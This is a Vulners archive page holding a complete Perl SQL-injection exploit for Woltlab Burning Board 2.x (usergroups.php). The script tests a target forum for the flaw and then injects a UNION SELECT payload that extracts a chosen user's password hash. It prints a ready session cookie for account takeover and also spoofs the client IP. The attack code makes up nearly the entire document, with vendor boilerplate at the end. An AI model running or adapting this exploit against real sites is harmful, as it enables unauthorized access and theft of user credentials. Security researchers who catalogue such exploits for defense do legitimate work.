Vulners
Lucene search
Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit
=======================================================================
Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit
=======================================================================
#!/usr/bin/perl
# Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl
# written by x666
# jmp-esp.kicks-ass.net;blueshisha.chills.it
# SR-CREW
# should work on every wbb regardless of php settings.
#
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
getopt('uiUpAcC');
our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );
my $target = shift;
sub do_request($$);
if ( !$target ) { &HELP_MESSAGE; }
if ( !$opt_U && !$opt_C) { &HELP_MESSAGE; }
my ( $host, $folder );
if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {
$host = $1;
$folder = ( $2 ? $2 : '/' );
if ( $folder !~ /\/$/ ) { $folder .= '/'; }
$target = "http://$host$folder" . 'usergroups.php';
}
else { &HELP_MESSAGE; }
my $ip = ( $opt_i ? $opt_i : '127.0.0.1' );
my ( $userid, $userpassword, $proxy, $proxyip );
( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;
( $proxy, $proxyip ) = split( ':', $opt_p ) if $opt_p;
my $uid = ( $opt_u ? $opt_u : 1 );
my $useragent =
( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );
my $isHash = 0;
print "burned2.pl written by x666\n";
print "report errors \@ blueshisha\@safe-mail.net.. thx\n";
print "[x] Attacking $target...\n";
if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }
if ( !$opt_c ) {
my $headers = do_request( '', '' );
if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {
$prefix = $1;
}
else { print $headers}
}
print "[x] Cookie prefix: $prefix\n";
print "[x] Vulnerable check:";
my $answer;
my $pre;
$answer = do_request( '\'', '' );
if ( $answer =~ /FROM (.*?)_applications/ ) {
$pre = $1;
print " Vulnerable\n";
}
elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/
or $answer =~ /Access denied/ )
{
print " No Idea\n";
print "[x] usergroups.php only for users,";
print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;
exit;
}
else {
print " Not Vulnerable!\n";
print $answer;
exit;
}
print "[x] Unleashing black magic...\n";
$answer = do_request(
'/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''
);
if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {
print "[x] Looks good!\n";
print "[x] Userid: $uid\n";
print "[x] Hash: $1\n";
if ( !$opt_C ) {
print
"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";
}
}
else {
print "[x] Looks bad!\n";
print $answer;
}
sub HELP_MESSAGE() {
print "burned2.pl written by x666\n"
. "perl $0 [options] url\n"
. "examples:\n"
. "perl $0 -U 10:123456 woltlab.de/de/forum/\n"
. "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"
. "overwrite -c only when the auto-check "
. "gives you a false result\n"
. "use -C when you need some special cookies\n"
. "options :\n-u userid of victim [1]\n"
. "-i faked client-ip [127.0.0.1]\n"
. "-U userid:password or userid:pwhash [none]\n"
. "-p proxyip:proxyport [none]\n"
. "-A user-agent [firefox 1.5.09]\n"
. "-c cookie-prefix [auto-check]\n"
. "-C raw cookie\n";
exit;
}
sub do_request($$) {
my $string = shift;
my $otherurl = shift;
if ($otherurl) { $target = "http://$host$folder" . $otherurl; }
else { $target = "http://$host$folder" . 'usergroups.php' }
$string = '/*' if ( !$string );
my $ua = LWP::UserAgent->new;
if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/" ); }
my $request = new HTTP::Request( 'POST', $target );
$request->content( 'applicationids%5B0)' . $string . '%5D=1'
. '&action=groupleaders_deleteapplications');
$request->authorization_basic('projectb', 'neustart');
$request->content_type('application/x-www-form-urlencoded');
$request->header( 'User-Agent' => $useragent );
if ($opt_U) {
my $userhash;
if ( !$isHash ) { $userhash = md5($userpassword); }
else { $userhash = $userpassword; }
my $cookie = $prefix
. 'userid='
. $userid . ';'
. $prefix
. 'userpassword='
. $userhash;
$request->header( 'Cookie' => $cookie );
}
elsif ($opt_C) {
$request->header( 'Cookie' => $opt_C );
$userid=3265;
}
$request->header( 'Client-Ip' => $ip );
my $response = $ua->request($request);
my $body = $response->content;
my $headers = $response->headers_as_string;
$body = $response->error_as_HTML if ( $response->is_error );
return $headers if ( $string eq '/*' and !$response->is_error );
return $body;
}
# MD5 Code ripped from Libwhisker for bigger portability
# thx rfp :)
{
my ( @S, @T, @M );
my $code = '';
sub md5 {
return undef if ( !defined $_[0] ); # oops, forgot the data
my $DATA = _md5_pad( $_[0] );
&_md5_init() if ( !defined $M[0] );
return _md5_perl_generated( \$DATA );
}
sub _md5_init {
return if ( defined $S[0] );
my $i;
for ( $i = 1 ; $i <= 64 ; $i++ ) {
$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
}
my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
for ( $i = 0 ; $i < 64 ; $i++ ) {
$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
}
@M = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,
5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,
0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9
);
&_md5_generate();
my $TEST = _md5_pad('foobar');
if ( _md5_perl_generated( \$TEST ) ne
'3858f62230ac3c915f300c664312c63f' )
{
die('Error: MD5 self-test not successful.');
}
}
sub _md5_pad {
my $l = length( my $msg = shift() . chr(128) );
$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
$l = ( $l - 1 ) * 8;
$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
return $msg;
}
sub _md5_generate {
my $N = 'abcddabccdabbcda';
my ( $i, $M ) = ( 0, '' );
$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems
$code = <<EOT;
sub _md5_perl_generated {
BEGIN { \$^H |= 1; }; # use integer
my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);
my (\$a,\$b,\$c,\$d,\$t,\$i);
my \$dr=shift;
my \$l=length(\$\$dr);
for my \$L (0 .. ((\$l/64)-1) ) {
my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
EOT
for ( $i = 0 ; $i < 16 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 32 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 48 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 64 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
$code .= <<EOT;
\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
} # for
return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }
EOT
eval "$code";
}
} # md5 package container
# 0day.today [2018-04-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Mar 2007 00:00Current
7.1High risk
Vulners AI Score7.1